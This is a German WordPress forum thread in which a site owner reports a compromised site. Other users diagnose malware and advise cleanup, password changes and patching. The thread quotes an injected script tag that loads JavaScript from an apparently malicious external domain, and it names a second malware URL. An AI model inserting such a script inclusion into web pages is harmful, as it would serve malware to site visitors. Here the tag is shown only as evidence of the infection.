organicfood-script - Wo suchen?

  • Hallo!

    Ich habe es gerade irgendwie gepachtet...

    http://www.reziratte.de

    Jetzt habe ich im Quelltext dieses nette Skript stehen:

    PHP
    <script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>

    Keine Ahnung, woher, aber ich glaube, es gehört da nicht hin.
    Ich weiß nur leider nicht, wo ich das suchen muss...
    Kann mir jemand einen Tipp geben?

    Außerdem sagte man mir heute, die Virenscanner würden mit der Meldung " http://jospics.net/z/zmlget" auf der Seite anspringen...?
    Was kann da passiert sein?


    Danke!

    VG
    pelzi

    Einmal editiert, zuletzt von pelznase (9. März 2012 um 15:08)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hallo,

    deine Seite ist laut Sucuri SiteCheck definitiv mit Malware verseucht: http://sitecheck.sucuri.net/results/http://www.reziratte.de .

    Bitte die Seite umgehend vom Netz nehmen und bereinigen. Deinen eigenen Rechner solltest du untersuchen, ob da evtl. ein Trojaner o.ä. vorhanden ist. Sämtliche Passwörter (auch FTP und MySQL) müssen von einem sicheren PC aus geändert werden. Auf deinem Webspace/Server kannst du keiner Datei mehr trauen. Ein sicheres Backup einzuspielen würde die Seite erst einmal säubern, aber wenn du die Sicherheitslücke, durch die der Angreifer eingedrungen ist, nicht findest kannst, wird die Seite bald wieder zum Ziel.
    Oftmals sind veraltete/fehlerhafte Plugins, Themes oder ein veraltetes WordPress selbst verantwortlich. Fehlerhafte Serverkonfiguration oder Malware auf dem eigenen PC können aber ebenfalls schuld sein. Solltest du es dir nicht zutrauen, diese Arbeiten selbst durchzuführen, findest du sicher in der Jobbörse einen Profi, der das für dich übernehmen kann.

    Viele Grüße Col

  • EDIT:
    Jetzt kommt der Aha-Effekt: Wie ich sehe, warst Du zuvor mit dem daysofyorr Trojaner "befreundet". Jetzt wird n Schuh draus... Dann hast Du nicht gründlich gereinigt und / oder Deine Zugangsdaten (Hoster/DB/FTP/WP) nicht geändert.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!